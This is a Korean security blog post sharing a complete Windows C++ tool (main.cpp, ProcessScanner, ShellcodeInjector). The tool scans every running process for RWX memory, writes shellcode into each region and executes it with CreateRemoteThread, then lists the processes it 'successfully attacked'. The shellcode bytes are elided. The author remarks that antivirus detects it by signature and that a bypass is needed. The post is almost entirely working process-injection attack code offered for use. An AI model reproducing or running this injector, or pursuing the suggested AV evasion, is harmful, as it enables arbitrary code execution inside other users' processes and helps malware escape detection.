Notice
Recent Posts
Recent Comments
Link
| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | ||
| 6 | 7 | 8 | 9 | 10 | 11 | 12 |
| 13 | 14 | 15 | 16 | 17 | 18 | 19 |
| 20 | 21 | 22 | 23 | 24 | 25 | 26 |
| 27 | 28 | 29 | 30 |
Tags
- ollama3.1
- dreamhack
- ollama mcp
- 해킹
- ghidra ollama mcp
- Django
- reversing ollama
- 백준
- web
- 해커
- 장고
- ghidra mcp
- reversing mcp
- ghidra
- webhacking.kr문제풀이
- djangovscode
- 파이썬웹
- vscode
- 리버싱
- reversing
- 해킹문제
- ghidra llm
- 바이러스
- 파이썬
- 코로나
- ghidra ollama
- jango
- 코로나바이러스
- 장고vscode
- 웹해킹
Archives
- Today
- Total
Kilkat
[tool] All Process RWX Shellcode Execution 본문
main.cpp
#include <iostream>
#include "ProcessScanner.h"
#include "ShellcodeInjector.h"
int main() {
std::cout << "[*] Scanning all processes for RWX memory...\n";
std::vector<RWXMemoryRegion> rwxRegions = find_rwx_memory_all_processes();
std::vector<RWXMemoryRegion> successfulAttacks; // Shellcode Injection 성공한 프로세스 저장
for (const auto& region : rwxRegions) {
if (inject_shellcode(region)) { // Shellcode Injection 성공하면 리스트에 추가
successfulAttacks.push_back(region);
}
}
std::cout << "\n[*] Exploit completed.\n";
// Shellcode Injection 성공한 프로세스 목록 출력
if (!successfulAttacks.empty()) {
std::cout << "[+] Successfully attacked processes:\n";
for (const auto& proc : successfulAttacks) {
std::cout << " - " << proc.processName << " (PID: " << proc.pid << ") | Address: " << proc.address << "\n";
}
}
else {
std::cout << "[-] No successful attacks.\n";
}
return 0;
}
ProcessScanner.cpp
#include "ProcessScanner.h"
#include <iostream>
#include <tlhelp32.h>
#include <string>
#include <locale>
#include <codecvt>
// 유니코드 `WCHAR`을 `std::string`으로 변환하는 함수
std::string wstring_to_string(const std::wstring& wstr) {
std::wstring_convert<std::codecvt_utf8<wchar_t>> converter;
return converter.to_bytes(wstr);
}
// 모든 프로세스에서 RWX 메모리 영역 검색
std::vector<RWXMemoryRegion> find_rwx_memory_all_processes() {
std::vector<RWXMemoryRegion> rwxRegions;
HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (snapshot == INVALID_HANDLE_VALUE) {
std::cerr << "[-] Failed to create process snapshot. Error: " << GetLastError() << std::endl;
return rwxRegions;
}
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
if (!Process32First(snapshot, &pe32)) {
CloseHandle(snapshot);
return rwxRegions;
}
do {
DWORD pid = pe32.th32ProcessID;
HANDLE processHandle = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, FALSE, pid);
if (processHandle) {
MEMORY_BASIC_INFORMATION mbi;
LPVOID address = 0;
while (VirtualQueryEx(processHandle, address, &mbi, sizeof(mbi))) {
if (mbi.State == MEM_COMMIT &&
(mbi.Protect == PAGE_EXECUTE_READWRITE || mbi.Protect == PAGE_EXECUTE_WRITECOPY)) {
std::string processName = wstring_to_string(pe32.szExeFile);
std::cout << "[+] RWX Memory Found in Process: " << processName
<< " (PID: " << pid << ") | Base Address: " << address
<< " | Region Size: " << mbi.RegionSize << " bytes" << std::endl;
rwxRegions.push_back({ pid, processName, mbi.BaseAddress, mbi.RegionSize });
}
address = (LPVOID)((DWORD_PTR)address + mbi.RegionSize);
}
CloseHandle(processHandle);
}
} while (Process32Next(snapshot, &pe32));
CloseHandle(snapshot);
return rwxRegions;
}
ProcessScanner.h
#pragma once
#include <windows.h>
#include <vector>
#include <string>
struct RWXMemoryRegion {
DWORD pid; // 프로세스 ID
std::string processName; // 프로세스 이름
LPVOID address; // RWX 메모리 영역 주소
SIZE_T size; // 메모리 영역 크기
};
// 모든 프로세스를 스캔하여 RWX 메모리 영역이 있는지 확인
std::vector<RWXMemoryRegion> find_rwx_memory_all_processes();
ShellcodeInjector.cpp
#include "ShellcodeInjector.h"
#include <iostream>
bool inject_shellcode(const RWXMemoryRegion& target) {
HANDLE processHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD, FALSE, target.pid);
if (!processHandle) {
std::cerr << "[-] Failed to open process " << target.pid << " (" << target.processName << "). Error: " << GetLastError() << std::endl;
return false;
}
unsigned char shellCode[] = "\x48\x31...";
SIZE_T shellCodeSize = sizeof(shellCode);
if (!WriteProcessMemory(processHandle, target.address, shellCode, shellCodeSize, NULL)) {
std::cerr << "[-] Failed to write shellcode to process " << target.pid << " (" << target.processName << "). Error: " << GetLastError() << std::endl;
CloseHandle(processHandle);
return false;
}
std::cout << "[+] Shellcode injected into " << target.processName << " (PID: " << target.pid << ") at " << target.address << std::endl;
HANDLE remoteThread = CreateRemoteThread(processHandle, NULL, 0,
(LPTHREAD_START_ROUTINE)target.address,
NULL, 0, NULL);
if (remoteThread) {
std::cout << "[+] Shellcode executed in " << target.processName << " (PID: " << target.pid << ")!" << std::endl;
CloseHandle(remoteThread);
CloseHandle(processHandle);
return true;
}
else {
std::cerr << "[-] Failed to execute shellcode in " << target.processName << ". Error: " << GetLastError() << std::endl;
CloseHandle(processHandle);
return false;
}
}
ShellcodeInjector.h
#pragma once
#include <windows.h>
#include <vector>
#include "ProcessScanner.h"
// 쉘코드를 삽입하고 실행하는 함수, 공격 성공 여부 반환
bool inject_shellcode(const RWXMemoryRegion& target);
전체 프로세스중 RWX 영역을 찾아 Shellcode 실행이 가능한지 간단히 확인하는 코드
Shellcode가 포함되어 AV에서 시그니쳐 탐지가 되므로, 우회 방법이 필요함
'Security > system hacking' 카테고리의 다른 글
| [tool] Powershell Reverse Shell (0) | 2025.02.24 |
|---|---|
| [tool] RWX Shellcode Execution (0) | 2025.02.20 |
| hackerschool ftz level9+bof 기본개념 (12) | 2018.06.15 |
'Security/system hacking' Related Articles
more
Comments